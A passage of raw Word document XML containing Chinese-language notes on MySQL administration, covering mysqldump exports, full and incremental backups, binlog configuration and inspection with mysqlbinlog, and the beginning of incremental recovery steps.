          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>导出单个数据表结构和数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617EADD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqldump --column-statistics=0 -h localhost -uroot -p123456  database table &gt; dump.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9A1087" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3778E8A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>导出整个数据库结构（不包含数据）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34813D4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqldump --column-statistics=0 -h localhost -uroot -p123456  -d database &gt; dump.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D19CADA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4187EE27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>导出单个数据表结构（不包含数据）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C829A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqldump --column-statistics=0 -h localhost -uroot -p123456  -d database table &gt; dump.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2E38E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C108A0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mysqldump 备份导出数据排除某张表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018C781B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>就用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> --ignore-table=dbname.tablename</w:t>
      </w:r>
      <w:r>
        <w:t>参数就行了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E84874" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>mysqldump -uusername -ppassword -h192.168.0.1 -P3306 dbname --ignore-table=dbname.dbtanles &gt; dump.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3036CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AB31F55" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="92" w:name="_Toc159779553"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w14:paraId="44C5FE0F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全备</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB05ACA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqldump -uroot -p yiku &gt; /opt/yiku.sql '//</w:t>
      </w:r>
      <w:r>
        <w:t>进行完全备份</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A97F350" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125E2EB0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4231DB9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC339C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增量备份</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158B7689" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行下面的命令，会多产生一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysql-bin.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>序号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224F1BF2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FEFD2E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqladmin -uroot -p flush-logs '//</w:t>
      </w:r>
      <w:r>
        <w:t>进行增量备份</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7AC667" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该命令等同于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令行内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: mysql&gt; flush logs;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A3922" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140E8D6B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="93" w:name="_Toc159779554"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log-bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bin-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="93"/>
    </w:p>
    <w:p w14:paraId="0D5400F7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r>
        <w:t>https://blog.csdn.net/kking_edc/article/details/111149340</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB5B4F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>binary-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的作用：</w:t>
      </w:r>
      <w:r>
        <w:t>https://www.cnblogs.com/chuanzhang053/p/8709954.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EC01CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>binlog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数参考：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/shiyong1949/article/details/74998883</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140E1DC5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C98D18D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DABF6E7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>my.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>my.cnf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中增加如下内容，然后重启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就开启了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192BA5F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[mysqld]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块下新增内容：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8A57A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>log-bin=mysql-bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6851B5F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>binlog-format=ROW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BE1707" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148622AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#log-bin</w:t>
      </w:r>
      <w:r>
        <w:t>设置此参数表示启用</w:t>
      </w:r>
      <w:r>
        <w:t>binlog</w:t>
      </w:r>
      <w:r>
        <w:t>功能，并指定路径名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EC934B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>log-bin=/var/lib/mysql/mysql-bin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DBA5A6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sync_binlog=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536E9F74" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>#binlog_cache_size</w:t>
      </w:r>
      <w:r>
        <w:t>此参数表示</w:t>
      </w:r>
      <w:r>
        <w:t>binlog</w:t>
      </w:r>
      <w:r>
        <w:t>使用的内存大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E81049" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>binlog_cache_size=1M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C5B6FB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36099BB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29A6AD58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A54CCDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>log-bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否开启</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2243B6C4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysql&gt; show variables like 'log_%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC74284" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysql&gt; show variables like '%binlog%';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694F761A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bin-log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进度：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2872AD78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>mysql&gt; show master status;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5275AF42" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以看到当前的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>binlog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在使用哪个文件，到了几行的什么位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D14894" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02DA01D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc159779555"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件：</w:t>
      </w:r>
      <w:r>
        <w:t>mysqlbinlog</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="0084CE01" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysqlbinlog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参数参考链接：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/weixin_43733154/article/details/106264722</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DFA162" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个案例：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/weixin_39788256/article/details/113589910</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3EECBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="380CC199" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6BCA58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>64</w:t>
      </w:r>
      <w:r>
        <w:t>位解码器按行输出日志文件放到</w:t>
      </w:r>
      <w:r>
        <w:t>/opt/aaa.txt</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E81EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mysqlbinlog --no-defaults --base64-output=decode-rows -v </w:t>
      </w:r>
      <w:r>
        <w:t>日志文件名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> /opt/aaa.txt</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0AAFB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>cat /opt/aaa.txt  '//</w:t>
      </w:r>
      <w:r>
        <w:t>查看日志文件的详细信息</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48040B26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2C7A75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B62C98C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc159779556"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>增量恢复</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w14:paraId="47DAE10B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令行中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>source xx.sql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令导入数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F82D1A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75E70A92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恢复时可以考虑临时关</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql_log_bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，恢复完后再开。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8D71DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭二进制日志记录功能：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
